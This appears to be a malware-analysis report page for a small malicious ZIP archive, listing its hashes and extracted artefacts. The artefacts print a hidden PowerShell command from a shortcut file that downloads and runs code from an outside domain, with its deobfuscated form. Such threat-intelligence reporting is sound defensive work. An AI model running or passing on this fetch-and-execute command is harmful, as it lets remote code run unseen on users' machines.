Malicious

b17e663f451010662f7b41d58da54e74

Share on LinkedIn Add to favorites

ZIP Archive

MD5: b17e663f451010662f7b41d58da54e74

Size: 855 B

application/zip

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	b17e663f451010662f7b41d58da54e74
Sha1	50729ac304fa43e71f4bae5f8a3fc1dace506052
Sha256	1356bf8be4d91d79450f17862cea9776b4a33d386762255aecd3f7c8b37de663
Sha384	24f7e86e77621a96a256f590f7724d4a08f5016f4f3b8edd83d6aca88a82e4001b85aca45adb6582795e43193addbe32
Sha512	a0937cf37c95403dd8f03772ce14fa840a657847b905f08187ef9586c522996df8ec72d567e4a4bcc9dec58df1eac7d9a3b9b81fff044e90e2e79a322ed6a084
SSDeep	12:5jhiVZhxjYGhUls8O7SFhe7z44lw//tWxgGvQEMcxahPZgRXeEVf8xyVtJD90IY4:9Uj0s8O7SFOVbgCQ3e/VkmbDeIYNB+n
TLSH	F311866161210A36D7FE16B125A810FEAFFD4389023962683563AE5222A65A40B43868

File Structure

Artefacts

Name	Value
LNK: Command Execution	cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -c "iex(irm yigu360.com)"
Deobfuscated PowerShell	Invoke-Expression (irm "yigu360.com")
Deobfuscated PowerShell	Invoke-Expression (irm "yigu360.com")

b17e663f451010662f7b41d58da54e74 (855 B)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙